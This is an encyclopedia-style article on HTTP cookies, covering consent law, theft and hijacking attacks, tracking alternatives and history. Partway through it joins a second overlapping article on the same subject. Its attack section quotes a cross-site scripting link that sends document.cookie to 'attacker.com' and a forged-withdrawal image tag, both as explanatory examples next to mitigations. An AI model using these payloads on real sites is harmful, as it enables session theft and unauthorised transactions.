Consent under the combination of the GDPR and e-Privacy Directive has to meet a number of conditions in relation to cookies.[79] It must be freely given and unambiguous: preticked boxes were banned under both the Data Protection Directive 1995[76] and the GDPR (Recital 32).[80] The GDPR is specific that consent must be as 'easy to withdraw as to give',[80] meaning that a reject-all button must be as easy to access in terms of clicks and visibility as an 'accept all' button.[79] It must be specific and informed, meaning that consent relates to particular purposes for the use of this data, and all organisations seeking to use this consent must be specifically named.[81][82] The Court of Justice of the European Union has also ruled that consent must be 'efficient and timely', meaning that it must be gained before cookies are laid and data processing begins instead of afterwards.[83]

The industry's response has been largely negative. Robert Bond of the law firm Speechly Bircham describes the effects as "far-reaching and incredibly onerous" for "all UK companies". Simon Davies of Privacy International argues that proper enforcement would "destroy the entire industry".[84] However, scholars note that the onerous nature of cookie pop-ups stems from an attempt to continue to operate a business model through convoluted requests that may be incompatible with the GDPR.[77]

Academic studies and regulators both describe widespread non-compliance with the law. A study scraping 10,000 UK websites found that only 11.8% of sites adhered to minimal legal requirements, with only 33.4% of websites studied providing a mechanism to reject cookies that was as easy to use as accepting them.[79] A study of 17,000 websites found that 84% of sites breached this criterion, finding additionally that many laid third party cookies with no notice at all.[85] The UK regulator, the Information Commissioner's Office, stated in 2019 that the industry's 'Transparency and Consent Framework' from the advertising technology group the Interactive Advertising Bureau was 'insufficient to ensure transparency and fair processing of the personal data in question and therefore also insufficient to provide for free and informed consent, with attendant implications for PECR [e-Privacy] compliance.'[81] Many companies that sell compliance solutions (Consent Management Platforms) permit them to be configured in manifestly illegal ways, which scholars have noted creates questions around the appropriate allocation of liability.[86]

A W3C specification called P3P was proposed for servers to communicate their privacy policy to browsers, allowing automatic, user-configurable handling. However, few websites implement the specification, and the W3C has discontinued work on the specification.[87]

Third-party cookies can be blocked by most browsers to increase privacy and reduce tracking by advertising and tracking companies without negatively affecting the user's web experience on all sites. Some sites operate 'cookie walls', which make access to a site conditional on allowing cookies either technically in a browser, through pressing 'accept', or both.[88] In 2020, the European Data Protection Board, composed of all EU data protection regulators, stated that cookie walls were illegal.

In order for consent to be freely given, access to services and functionalities must not be made conditional on the consent of a user to the storing of information, or gaining of access to information already stored, in the terminal equipment of a user (so called cookie walls).[89]

Many advertising operators have an opt-out option to behavioural advertising, with a generic cookie in the browser stopping behavioural advertising.[90][91] However, this is often ineffective against many forms of tracking, such as first-party tracking that is growing in popularity to avoid the impact of browsers blocking third party cookies.[92][93] Furthermore, if such a setting is more difficult to place than the acceptance of tracking, it remains in breach of the conditions of the e-Privacy Directive.[79]

Most websites use cookies as the only identifiers for user sessions, because other methods of identifying web users have limitations and vulnerabilities. If a website uses cookies as session identifiers, attackers can impersonate users' requests by stealing a full set of victims' cookies. From the web server's point of view, a request from an attacker then has the same authentication as the victim's requests; thus the request is performed on behalf of the victim's session.

Listed here are various scenarios of cookie theft and user session hijacking (even without stealing user cookies) that work with websites relying solely on HTTP cookies for user identification.

Network eavesdropping

A cookie can be stolen by another computer that is allowed to read from the network.

Traffic on a network can be intercepted and read by computers on the network other than the sender and receiver (particularly over unencrypted open Wi-Fi). This traffic includes cookies sent on ordinary unencrypted HTTP sessions. Where network traffic is not encrypted, attackers can therefore read the communications of other users on the network, including HTTP cookies as well as the entire contents of the conversations, for the purpose of a man-in-the-middle attack.

An attacker could use intercepted cookies to impersonate a user and perform a malicious task, such as transferring money out of the victim's bank account.

This issue can be resolved by securing the communication between the user's computer and the server by employing Transport Layer Security (HTTPS protocol) to encrypt the connection. A server can specify the Secure flag while setting a cookie, which will cause the browser to send the cookie only over an encrypted channel, such as a TLS connection.[45]

Publishing false sub-domain: DNS cache poisoning

If an attacker is able to cause a DNS server to cache a fabricated DNS entry (called DNS cache poisoning), then this could allow the attacker to gain access to a user's cookies. For example, an attacker could use DNS cache poisoning to create a fabricated DNS entry of f12345.www.example.com that points to the IP address of the attacker's server. The attacker can then post an image URL from their own server (for example, http://f12345.www.example.com/img_4_cookie.jpg). Victims reading the attacker's message would download this image from f12345.www.example.com. Since f12345.www.example.com is a sub-domain of www.example.com, victims' browsers would submit all example.com-related cookies to the attacker's server.

If an attacker is able to accomplish this, it is usually the fault of the Internet Service Providers for not properly securing their DNS servers. However, the severity of this attack can be lessened if the target website uses secure cookies. In this case, the attacker would have the extra challenge[94] of obtaining the target website's TLS certificate from a certificate authority, since secure cookies can only be transmitted over an encrypted connection. Without a matching TLS certificate, victims' browsers would display a warning message about the attacker's invalid certificate, which would help deter users from visiting the attacker's fraudulent website and sending the attacker their cookies.

Cookies can also be stolen using a technique called cross-site scripting. This occurs when an attacker takes advantage of a website that allows its users to post unfiltered HTML and JavaScript content. By posting malicious HTML and JavaScript code, the attacker can cause the victim's web browser to send the victim's cookies to a website the attacker controls.

As an example, an attacker may post a message on www.example.com with the following link:

<a href="#" onclick="window.location = 'http://attacker.com/stole.cgi?text=' + escape(document.cookie); return false;">Click here!</a>
Cross-site scripting: a cookie that should be only exchanged between a server and a client is sent to another party.

When another user clicks on this link, the browser executes the piece of code within the onclick attribute, thus replacing the string document.cookie with the list of cookies that are accessible from the current page. As a result, this list of cookies is sent to the attacker.com server. If the attacker's malicious posting is on an HTTPS website https://www.example.com, secure cookies will also be sent to attacker.com in plain text.

It is the responsibility of the website developers to filter out such malicious code.

Such attacks can be mitigated by using HttpOnly cookies. These cookies will not be accessible by client-side scripting languages like JavaScript, and therefore, the attacker will not be able to gather these cookies.

Cross-site scripting: proxy request

In older versions of many browsers, there were security holes in the implementation of the XMLHttpRequest API. This API allows pages to specify a proxy server that would get the reply, and this proxy server is not subject to the same-origin policy. For example, a victim is reading an attacker's posting on www.example.com, and the attacker's script is executed in the victim's browser. The script generates a request to www.example.com with the proxy server attacker.com. Since the request is for www.example.com, all example.com cookies will be sent along with the request, but routed through the attacker's proxy server. Hence, the attacker would be able to harvest the victim's cookies.

This attack would not work with secure cookies, since they can only be transmitted over HTTPS connections, and the HTTPS protocol dictates end-to-end encryption (i.e. the information is encrypted on the user's browser and decrypted on the destination server). In this case, the proxy server would only see the raw, encrypted bytes of the HTTP request.

Cross-site request forgery

For example, Bob might be browsing a chat forum where another user, Mallory, has posted a message. Suppose that Mallory has crafted an HTML image element that references an action on Bob's bank's website (rather than an image file), e.g.,

<img src="http://bank.example.com/withdraw?account=bob&amount=1000000&for=mallory">

If Bob's bank keeps his authentication information in a cookie, and if the cookie hasn't expired, then the attempt by Bob's browser to load the image will submit the withdrawal form with his cookie, thus authorizing a transaction without Bob's approval.

Cookiejacking

Cookiejacking is an attack against Internet Explorer which allows the attacker to steal session cookies of a user by tricking a user into dragging an object across the screen.[95] Microsoft deemed the flaw low-risk because of "the level of required user interaction",[95] and the necessity of having a user already logged into the website whose cookie is stolen.[96] Despite this, a researcher tried the attack on 150 of their Facebook friends and obtained cookies of 80 of them via social engineering.[95]

Drawbacks of cookies

Besides privacy concerns, cookies also have some technical drawbacks. In particular, they do not always accurately identify users, they can be used for security attacks, and they are often at odds with the Representational State Transfer (REST) software architectural style.[97][98]

Inaccurate identification

If more than one browser is used on a computer, each usually has a separate storage area for cookies. Hence, cookies do not identify a person, but a combination of a user account, a computer, and a web browser. Thus, anyone who uses multiple accounts, computers, or browsers has multiple sets of cookies.[99]

Likewise, cookies do not differentiate between multiple users who share the same user account, computer, and browser.

Alternatives to cookies

Some of the operations that can be done using cookies can also be done using other mechanisms.

Authentication and session management

JSON Web Tokens

A JSON Web Token (JWT) is a self-contained packet of information that can be used to store user identity and authenticity information, which allows JWTs to be used in place of session cookies. Unlike cookies, which are automatically attached to each HTTP request by the browser, JWTs must be explicitly attached to each HTTP request by the web application.
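
As a rough illustration of what "self-contained" means here, the sketch below signs and verifies a token with HMAC-SHA256 (the HS256 algorithm) using only the Python standard library. The function names, the secret, and the claim names are assumptions made for this example; it deliberately omits expiry checks and header validation, which a real deployment would need.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional


def b64url(data: bytes) -> str:
    """Base64url-encode without padding, the encoding JWT segments use."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    """Decode base64url after restoring the stripped padding."""
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_jwt(claims: dict, secret: bytes) -> str:
    """Build header.payload.signature, signed with HMAC-SHA256."""
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = ".".join(
        b64url(json.dumps(part, separators=(",", ":")).encode("utf-8"))
        for part in (header, claims)
    )
    signature = hmac.new(secret, signing_input.encode("ascii"), hashlib.sha256).digest()
    return f"{signing_input}.{b64url(signature)}"


def verify_jwt(token: str, secret: bytes) -> Optional[dict]:
    """Return the claims if the signature is valid, otherwise None."""
    try:
        header_b64, payload_b64, signature_b64 = token.split(".")
        signing_input = f"{header_b64}.{payload_b64}".encode("ascii")
        expected = hmac.new(secret, signing_input, hashlib.sha256).digest()
        if not hmac.compare_digest(expected, b64url_decode(signature_b64)):
            return None
        return json.loads(b64url_decode(payload_b64))
    except ValueError:
        # Wrong number of segments, bad base64, or bad JSON.
        return None


# Hypothetical usage: the application, not the browser, attaches the token.
token = sign_jwt({"sub": "alice"}, b"demo-secret")
request_headers = {"Authorization": f"Bearer {token}"}
```

Because nothing attaches the token automatically, the application decides which requests carry it, which is the contrast with cookies drawn above.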

HTTP authentication

The HTTP protocol includes the basic access authentication and the digest access authentication protocols, which allow access to a web page only when the user has provided the correct username and password. If the server requires such credentials for granting access to a web page, the browser requests them from the user and, once obtained, the browser stores and sends them in every subsequent page request. This information can be used to track the user.
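
For basic access authentication, the credential the browser resends is simply the Base64 encoding of `username:password` in an Authorization header. The sketch below shows that encoding and its inverse; the function names are illustrative, not part of any library.

```python
import base64
from typing import Optional, Tuple


def basic_auth_header(username: str, password: str) -> str:
    """Return the Authorization header value for basic access authentication."""
    credentials = f"{username}:{password}".encode("utf-8")
    return "Basic " + base64.b64encode(credentials).decode("ascii")


def parse_basic_auth(header_value: str) -> Optional[Tuple[str, str]]:
    """Recover (username, password) from a header value, or None if malformed."""
    scheme, _, encoded = header_value.partition(" ")
    if scheme.lower() != "basic":
        return None
    try:
        decoded = base64.b64decode(encoded, validate=True).decode("utf-8")
    except ValueError:
        return None
    username, separator, password = decoded.partition(":")
    return (username, password) if separator else None
```

Base64 is an encoding, not encryption, so anyone who can read the header can recover the password; this is why basic authentication is normally only used over HTTPS.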

URL (query string)

The query string part of the URL is the part that is typically used for this purpose, but other parts can be used as well. The Java Servlet and PHP session mechanisms both use this method if cookies are not enabled.

This method consists of the web server appending query strings containing a unique session identifier to all the links inside of a web page. When the user follows a link, the browser sends the query string to the server, allowing the server to identify the user and maintain state.
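
A minimal sketch of this link rewriting, assuming a hypothetical query parameter named `sid`, could look like the following. The server would apply `add_session_id` to every link it emits and `read_session_id` to every incoming request URL.

```python
from typing import Optional
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit


def add_session_id(url: str, session_id: str, param: str = "sid") -> str:
    """Append (or replace) the session identifier in a link's query string."""
    parts = urlsplit(url)
    query = [
        (key, value)
        for key, value in parse_qsl(parts.query, keep_blank_values=True)
        if key != param
    ]
    query.append((param, session_id))
    return urlunsplit(parts._replace(query=urlencode(query)))


def read_session_id(url: str, param: str = "sid") -> Optional[str]:
    """Extract the session identifier from a requested URL, if present."""
    return dict(parse_qsl(urlsplit(url).query)).get(param)
```

For example, `add_session_id("/cart?item=42", "abc123")` yields `/cart?item=42&sid=abc123`, and anyone who receives that URL receives the session identifier with it.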

These kinds of query strings are very similar to cookies in that both contain arbitrary pieces of information chosen by the server and both are sent back to the server on every request. However, there are some differences. Since a query string is part of a URL, if that URL is later reused, the same attached piece of information will be sent to the server, which could lead to confusion. For example, if the preferences of a user are encoded in the query string of a URL and the user sends this URL to another user by e-mail, those preferences will be used for that other user as well.

Moreover, if the same user accesses the same page multiple times from different sources, there is no guarantee that the same query string will be used each time. For example, if a user visits a page by coming from a page internal to the site the first time, and then visits the same page by coming from an external search engine the second time, the query strings would likely be different. If cookies were used in this situation, the cookies would be the same.

Other drawbacks of query strings are related to security. Storing data that identifies a session in a query string enables session fixation attacks, referer logging attacks and other security exploits. Transferring session identifiers as HTTP cookies is more secure.

Hidden form fields

Another form of session tracking is to use web forms with hidden fields. This technique is very similar to using URL query strings to hold the information and has many of the same advantages and drawbacks. In fact, if the form is handled with the HTTP GET method, then this technique is similar to using URL query strings, since the GET method adds the form fields to the URL as a query string. But most forms are handled with HTTP POST, which causes the form information, including the hidden fields, to be sent in the HTTP request body, which is neither part of the URL, nor of a cookie.

This approach presents two advantages from the point of view of the tracker. First, having the tracking information placed in the HTTP request body rather than in the URL means it will not be noticed by the average user. Second, the session information is not copied when the user copies the URL (to bookmark the page or send it via email, for example).

window.name DOM property

All current web browsers can store a fairly large amount of data (2–32 MB) via JavaScript using the DOM property window.name. This data can be used instead of session cookies. The technique can be coupled with JSON/JavaScript objects to store complex sets of session variables on the client side.

The downside is that every separate window or tab will initially have an empty window.name property when opened.

In some respects, this can be more secure than cookies because its contents are not automatically sent to the server on every request like cookies are, so it is not vulnerable to network cookie sniffing attacks.

Tracking

IP address

Some users may be tracked based on the IP address of the computer requesting the page. The server knows the IP address of the computer running the browser (or the proxy, if any is used) and could theoretically link a user's session to this IP address.

However, IP addresses are generally not a reliable way to track a session or identify a user. Many computers designed to be used by a single user, such as office PCs or home PCs, are behind a network address translator (NAT). This means that several PCs will share a public IP address. Furthermore, some systems, such as Tor, are designed to retain Internet anonymity, rendering tracking by IP address impractical, impossible, or a security risk.

ETag

Because ETags are cached by the browser, and returned with subsequent requests for the same resource, a tracking server can simply repeat any ETag received from the browser to ensure an assigned ETag persists indefinitely (in a similar way to persistent cookies). Additional caching header fields can also enhance the preservation of ETag data.
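
The echo behaviour can be sketched as a request handler that treats the validator as an identifier. This is a simplified model, not a real server: the function name, the header dictionary, and the choice of `Cache-Control: private, no-cache` (which lets the browser store the response but forces revalidation, so the ETag is sent back each time) are assumptions for illustration.

```python
import secrets
from typing import Dict, Tuple


def handle_tracking_request(request_headers: Dict[str, str]) -> Tuple[int, Dict[str, str], str]:
    """Return (status, response headers, visitor id) for a tracked resource."""
    presented = request_headers.get("If-None-Match")
    if presented:
        # Returning visitor: repeat the same ETag so the browser keeps it.
        return 304, {"ETag": presented}, presented.strip('"')
    # First visit: mint a random identifier and hand it out as the ETag.
    visitor_id = secrets.token_hex(8)
    headers = {
        "ETag": f'"{visitor_id}"',
        "Cache-Control": "private, no-cache",
    }
    return 200, headers, visitor_id
```

On a later visit the browser revalidates the cached resource with `If-None-Match`, and the handler recognises the visitor without any cookie being involved.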

ETags can be flushed in some browsers by clearing the browser cache.

Browser cache

The browser cache can also be used to store information that can be used to track individual users. This technique takes advantage of the fact that the web browser will use resources stored within the cache instead of downloading them from the website when it determines that the cache already has the most up-to-date version of the resource.

For example, a website could serve a JavaScript file with code that sets a unique identifier for the user (for example, var userId = 3243242;). After the user's initial visit, every time the user accesses the page, this file will be loaded from the cache instead of downloaded from the server. Thus, its content will never change.

Browser fingerprint

A browser fingerprint is information collected about a browser's configuration, such as version number, screen resolution, and operating system, for the purpose of identification. Fingerprints can be used to fully or partially identify individual users or devices even when cookies are turned off.

Basic web browser configuration information has long been collected by web analytics services in an effort to accurately measure real human web traffic and discount various forms of click fraud. With the assistance of client-side scripting languages, collection of much more esoteric parameters is possible.[100][101] Assimilation of such information into a single string constitutes a device fingerprint. In 2010, EFF measured at least 18.1 bits of entropy possible from browser fingerprinting.[102] Canvas fingerprinting, a more recent technique, claims to add another 5.7 bits.
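
The sketch below illustrates both ideas in this paragraph under simple assumptions: collected attributes (the keys shown are hypothetical) are assimilated into a single string by hashing them in a canonical order, and an entropy figure in bits is converted into the size of the group a browser would hide in, using the relation that b bits distinguish one browser among roughly 2^b.

```python
import hashlib


def fingerprint(attributes: dict) -> str:
    """Collapse browser attributes into one stable identifier string."""
    canonical = "\n".join(f"{key}={attributes[key]}" for key in sorted(attributes))
    return hashlib.sha256(canonical.encode("utf-8")).hexdigest()


def anonymity_set_size(bits_of_entropy: float) -> float:
    """Number of browsers among which one fingerprint is expected to be unique."""
    return 2 ** bits_of_entropy


# Hypothetical attribute values, for illustration only.
example = {
    "user_agent": "ExampleBrowser/1.0",
    "screen": "1920x1080",
    "timezone": "UTC+1",
}
identifier = fingerprint(example)
```

With the 18.1 bits cited above, `anonymity_set_size(18.1)` is on the order of 280,000, meaning a typical browser would share its fingerprint with about one in that many others.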

Web storage

Some web browsers support persistence mechanisms which allow the page to store the information locally for later use.

The HTML5 standard (which most modern web browsers support to some extent) includes a JavaScript API called Web storage that allows two types of storage: local storage and session storage. Local storage behaves similarly to persistent cookies while session storage behaves similarly to session cookies, except that session storage is tied to an individual tab/window's lifetime (also known as a page session), not to a whole browser session like session cookies.[103]

Internet Explorer supports persistent information[104] in the browser's history, in the browser's favorites, in an XML store ("user data"), or directly within a web page saved to disk.

Some web browser plugins include persistence mechanisms as well. For example, Adobe Flash has Local shared object and Microsoft Silverlight has Isolated storage.[105]

from Grokipedia
An HTTP cookie is a mechanism that allows an HTTP server to store stateful information, in the form of name-value pairs known as cookies, on a client-side HTTP user agent such as a web browser. The server sets cookies via the Set-Cookie response header, and the user agent returns them in the Cookie request header for subsequent requests to the same site, thereby enabling persistence of data like session identifiers or user preferences across stateless HTTP transactions. Developed in 1994 by Lou Montulli, a programmer at Netscape Communications Corporation, HTTP cookies originated as a solution for maintaining shopping cart contents in early e-commerce applications, where the stateless nature of HTTP otherwise required users to reselect items on each page navigation. Standardized in RFC 6265 by the Internet Engineering Task Force (IETF) in 2011, cookies support attributes for expiration, security (e.g., Secure and HttpOnly flags to mitigate interception and scripting attacks), and scoping to domains or paths, facilitating uses such as user authentication, site personalization, and behavioral tracking.

While essential for functional web experiences, HTTP cookies have sparked controversies over privacy and security, particularly third-party cookies embedded in advertisements or scripts that enable cross-site user profiling without explicit consent, leading to exploits like cookie theft via network sniffing or cross-site scripting and to regulatory responses including consent requirements under frameworks like the EU's ePrivacy Directive. Major browsers have since implemented controls, such as blocking third-party cookies by default in Safari and Firefox, with Google Chrome planning deprecation amid ongoing debates over alternatives like the Privacy Sandbox that preserve some tracking capabilities under privacy veneers.

Definition and Fundamentals

Purpose and Core Mechanism

The HTTP protocol operates in a stateless manner, meaning each client request to a server is treated independently without inherent memory of prior interactions. HTTP cookies address this limitation by enabling servers to store small amounts of stateful data on the client device, which the client then returns in subsequent requests to the same server, thereby simulating continuity across sessions. This mechanism supports functions such as user authentication, session tracking, and preference storage without requiring persistent server-side storage for every user.

In the core exchange process, a server initiates cookie creation by including a Set-Cookie header field in its HTTP response to a client request. The header specifies a cookie as a name-value pair, optionally accompanied by attributes like Domain, Path, Expires, Max-Age, Secure, and HttpOnly, which dictate storage conditions, transmission rules, and accessibility. Upon receipt, the client (typically a web browser) evaluates these attributes against its policies and, if compliant, stores the cookie locally, in memory or on disk depending on persistence directives.

For retrieval, the client automatically appends a Cookie header to outgoing requests matching the cookie's domain and path criteria, containing the relevant name-value pairs separated by semicolons. The server then inspects this header to reconstruct session state or user context, enabling personalized responses without embedding data in URLs or requiring client-side scripting for basic persistence. This bidirectional header-based transmission keeps cookies largely invisible to the user while facilitating efficient state management, though clients may reject or ignore cookies based on user-configured privacy settings or regulatory compliance.
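
The exchange can be sketched with Python's standard `http.cookies` module. The helper names and the `TinyClient` class are invented for this illustration, and the client here is deliberately naive: it returns every stored cookie and ignores domain, path, and expiry rules.

```python
from http.cookies import SimpleCookie


def server_set_cookie(name: str, value: str) -> str:
    """Return the value of a Set-Cookie response header for one cookie."""
    cookie = SimpleCookie()
    cookie[name] = value
    cookie[name]["path"] = "/"
    return cookie[name].OutputString()


class TinyClient:
    """Stores cookies from responses and replays them on later requests."""

    def __init__(self) -> None:
        self.jar = SimpleCookie()

    def receive(self, set_cookie_value: str) -> None:
        # Parse the name-value pair and its attributes into the jar.
        self.jar.load(set_cookie_value)

    def cookie_header(self) -> str:
        # Only name=value pairs go back to the server, never the attributes.
        return "; ".join(f"{m.key}={m.coded_value}" for m in self.jar.values())


def server_read_cookies(cookie_header: str) -> dict:
    """Parse the Cookie request header back into a name-to-value mapping."""
    return {name: morsel.value for name, morsel in SimpleCookie(cookie_header).items()}


client = TinyClient()
client.receive(server_set_cookie("sessionid", "abc123"))
client.receive(server_set_cookie("preference", "dark"))
state = server_read_cookies(client.cookie_header())
```

Note the asymmetry: attributes such as Path travel only from server to client, while the request carries just the pairs the server needs to rebuild its state.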

Data Structure and Transmission

HTTP cookies are transmitted between web servers and user agents primarily through specialized HTTP header fields. Servers instruct user agents to store cookies using the Set-Cookie response header field, which conveys a cookie-name paired with a cookie-value, optionally accompanied by attributes that govern the cookie's scope, persistence, and security properties. The Set-Cookie header adheres to the syntax cookie-name=VALUE [; cookie-av], where VALUE is an opaque string not containing prohibited characters such as semicolons, commas, or control characters, and cookie-av represents attribute-value pairs separated by semicolons. Multiple Set-Cookie headers can appear in a single response to set multiple cookies. Key attributes in the Set-Cookie header define the cookie's behavior:
| Attribute | Description | Example |
| --- | --- | --- |
| Domain | Specifies the hosts to which the cookie applies; if omitted, the cookie applies only to the host of the request URI, not its subdomains. | Domain=example.com |
| Path | Defines the URI path prefix for which the cookie is valid; defaults to the directory portion of the request URI's path. | Path=/docs |
| Expires | Sets an absolute expiration date and time in HTTP-date format after which the cookie should be discarded. | Expires=Tue, 21 Oct 2025 07:28:00 GMT |
| Max-Age | Specifies the maximum age in seconds for the cookie's persistence; takes precedence over Expires if both are present. | Max-Age=3600 |
| Secure | Indicates the cookie should only be transmitted over secure (HTTPS) connections. | Secure |
| HttpOnly | Prevents client-side scripts from accessing the cookie, mitigating cross-site scripting risks. | HttpOnly |

User agents parse and store cookies based on these attributes, rejecting invalid ones such as those with mismatched domains or malformed dates. Upon subsequent HTTP requests to matching hosts and paths, the user agent transmits stored cookies back to the server via the Cookie request header field. The Cookie header lists relevant cookies as cookie-name=VALUE pairs separated by semicolons, in an order chosen by the user agent that servers should not rely on. For example, a request might include Cookie: sessionid=abc123; preference=dark.

Only cookies that satisfy the domain, path, and secure attributes are included; session cookies (lacking Expires or Max-Age) are discarded upon session termination, typically browser closure. This bidirectional transmission enables stateless HTTP to maintain state across requests.
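
The selection rule described above can be approximated as follows. This is a simplified sketch of the domain-match and path-match checks in the spirit of RFC 6265, with an invented `StoredCookie` record; it ignores expiry, public-suffix checks, and the SameSite attribute.

```python
import ipaddress
from dataclasses import dataclass


@dataclass
class StoredCookie:
    name: str
    value: str
    domain: str
    path: str = "/"
    secure: bool = False
    host_only: bool = True  # True when the server sent no Domain attribute


def is_ip_address(host: str) -> bool:
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def domain_matches(host: str, cookie_domain: str) -> bool:
    """True if host equals the domain or is a subdomain of it (never for IPs)."""
    host, cookie_domain = host.lower(), cookie_domain.lower()
    if host == cookie_domain:
        return True
    return host.endswith("." + cookie_domain) and not is_ip_address(host)


def path_matches(request_path: str, cookie_path: str) -> bool:
    """True if cookie_path is the request path or a directory prefix of it."""
    if request_path == cookie_path:
        return True
    if request_path.startswith(cookie_path):
        return cookie_path.endswith("/") or request_path[len(cookie_path)] == "/"
    return False


def should_send(cookie: StoredCookie, host: str, path: str, is_https: bool) -> bool:
    """Decide whether a stored cookie belongs in the Cookie request header."""
    if cookie.host_only:
        domain_ok = host.lower() == cookie.domain.lower()
    else:
        domain_ok = domain_matches(host, cookie.domain)
    return domain_ok and path_matches(path, cookie.path) and (is_https or not cookie.secure)
```

The boundary checks matter: a cookie for `example.com` must not reach `badexample.com`, and a cookie scoped to `/docs` must not reach `/docsearch`.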

Historical Development

Invention by Lou Montulli

Lou Montulli, a software engineer at Netscape Communications Corporation, invented the HTTP cookie in June 1994 to address the stateless nature of the Hypertext Transfer Protocol (HTTP), which prevented web servers from maintaining user session information across multiple requests. This limitation hindered the development of interactive web applications, such as online shopping carts that required remembering user selections. Montulli, then 23 years old, devised the mechanism during discussions about enhancing Netscape's shopping server capabilities, collaborating with engineer John Giannandrea to draft an initial specification. The cookie allowed servers to send a small packet of data, typically a unique identifier, to the client's browser, which would store and return it in subsequent requests to the same domain, enabling site-specific state management without broader cross-site tracking.

The term "cookie" drew from the concept of a "magic cookie," a term used in computing for opaque data packets exchanged between processes. Montulli's design aimed to preserve user anonymity, intending the technology primarily for functional purposes like session persistence and personalization on individual websites rather than pervasive surveillance. The feature was first implemented in the Mosaic Netscape version 0.9 beta, released on October 13, 1994, and its inaugural deployment occurred on Netscape's own website to distinguish first-time visitors from returning ones. Montulli filed a patent application for the cookie mechanism in 1995, which the U.S. Patent and Trademark Office granted as U.S. Patent 5,774,670 in 1998, covering the method of embedding state information in HTTP headers. This invention laid the groundwork for persistent web interactivity, though its later adaptations for advertising raised privacy concerns unforeseen at the time of creation.

Early Adoption and Standardization

HTTP cookies saw initial implementation in the Mosaic Netscape version 0.9 beta, released on October 13, 1994, marking the first public browser support for the technology originally developed by Lou Montulli to maintain state across stateless HTTP requests, such as for tracking shopping cart contents on Netscape's own online store. This proprietary feature quickly proved essential for early e-commerce and session management, as the web's growth demanded mechanisms beyond basic HTTP's limitations. Adoption accelerated with Microsoft's inclusion of cookie support in Internet Explorer 2.0, launched in November 1995, which mirrored Netscape's approach and spurred competitive browser development amid the browser wars. By the mid-1990s, cookies had become a standard feature in major browsers, enabling websites to store user-specific data like preferences and login states, though implementations varied slightly between vendors, leading to interoperability concerns.

The Internet Engineering Task Force (IETF) initiated formal standardization to address these discrepancies and define cookie semantics more rigorously; RFC 2109, titled "HTTP State Management Mechanism," was published in February 1997, specifying the Set-Cookie response header for servers to set cookies and the Cookie request header for clients to return them, while introducing attributes like expiration times and paths for finer control. This document aimed to supersede Netscape's original draft but retained backward compatibility, though it faced limited adoption due to browser vendors' reluctance to break existing sites. Subsequent refinements addressed shortcomings in RFC 2109, such as ambiguous parsing rules and security gaps; RFC 2965, released in October 2000, introduced versioned cookies (set via a new Set-Cookie2 header) with enhanced domain matching and discard attributes to mitigate unintended sharing, though it saw minimal browser implementation in favor of the simpler Netscape/RFC 2109 format.

These early standards laid the groundwork for cookies' ubiquity, with over 90% of websites employing them by the early 2000s for personalization and tracking, despite emerging privacy debates that highlighted the technology's potential for cross-site data correlation without explicit user consent. Standardization efforts underscored the tension between functional necessity and the risks of opaque state persistence, influencing later evolutions toward attributes like Secure and HttpOnly for improved security.

Session and Persistent Cookies

Session cookies, also referred to as temporary or in-memory cookies, are HTTP cookies transmitted without an Expires or Max-Age attribute in the Set-Cookie header, causing the user agent to delete them automatically upon termination of the browsing session, typically when the browser or its associated tabs are closed. This behavior ensures that session cookies maintain state only for the duration of a single user interaction with a website, such as tracking items in a shopping cart or preserving form data across pages without requiring persistent storage. Unlike persistent variants, session cookies are typically held in memory rather than written to disk, minimizing long-term data retention and reducing exposure to forensic analysis or unauthorized access via file system inspection.

Persistent cookies, in contrast, incorporate an Expires attribute (specifying an absolute date and time in HTTP-date format) or a Max-Age attribute (indicating a relative lifetime in seconds), enabling the user agent to store them on the client's persistent storage, such as the hard disk, until the designated expiration elapses or the cookie is manually deleted. This persistence allows websites to recall user-specific data across multiple browsing sessions, facilitating features like "remember me" functionality, where a cookie might store an encrypted token valid for 30 days or longer, or site preferences such as language settings retained until the cookie expires or is overridden. The Max-Age attribute, which RFC 6265 (published April 2011) retains from the earlier cookie specifications, takes precedence over Expires when both are present; a zero or negative value causes the cookie to expire immediately rather than behave like a session cookie, and user agents treat cookies with neither attribute as non-persistent.

The distinction arises from the stateless nature of HTTP, where cookies provide a mechanism to associate client-side state with server requests; session cookies suffice for ephemeral needs, avoiding unnecessary disk writes and potential leaks from residual files, while persistent cookies enable efficiency by reducing repeated server queries but introduce risks like extended tracking if expiration dates are set excessively long (e.g., years). Both types are set via the Set-Cookie response header from the server and returned in the Cookie request header, but persistent cookies remain on the device between sessions, where they are subject to user deletion via browser settings, whereas session cookies evade such persistence unless the session is artificially prolonged. Browsers such as Chrome and Firefox discard session cookies when the browsing session ends, in line with privacy-focused designs that prioritize minimal data retention, although session-restore features can carry them over to the next launch.
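
The classification can be expressed as a small function that derives an expiry time from a cookie's attributes. This is a sketch under simplifying assumptions: attributes arrive as an already-parsed dictionary (a hypothetical input format), and a return value of None stands for a session cookie.

```python
from datetime import datetime, timedelta, timezone
from email.utils import parsedate_to_datetime
from typing import Optional


def cookie_expiry(attributes: dict, now: datetime) -> Optional[datetime]:
    """Return when the cookie expires, or None for a session cookie."""
    if "Max-Age" in attributes:
        # Max-Age wins over Expires when both are present.
        seconds = int(attributes["Max-Age"])
        if seconds <= 0:
            # Zero or negative: already expired, so the cookie is removed.
            return datetime.min.replace(tzinfo=timezone.utc)
        return now + timedelta(seconds=seconds)
    if "Expires" in attributes:
        return parsedate_to_datetime(attributes["Expires"])
    return None


def is_session_cookie(attributes: dict) -> bool:
    """A cookie with neither attribute lives only for the browsing session."""
    return "Max-Age" not in attributes and "Expires" not in attributes
```

A server that wants to delete a cookie can therefore resend it with `Max-Age=0`, while omitting both attributes leaves the lifetime up to the browser session.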

Attribute-Based Types (Secure, HttpOnly, SameSite)

The Secure attribute specifies that the user agent must transmit the cookie only over secure protocols, such as HTTPS, thereby preventing its transmission over unencrypted HTTP connections and reducing the risk of interception by network attackers. This attribute does not encrypt the cookie's contents but ensures the cookie is withheld from insecure channels, as defined in the HTTP state management mechanism standardized in RFC 6265 (April 2011). Servers set it via the Set-Cookie header, e.g., Set-Cookie: sessionId=abc123; Secure, and user agents such as browsers enforce it by omitting the cookie from plain HTTP requests.
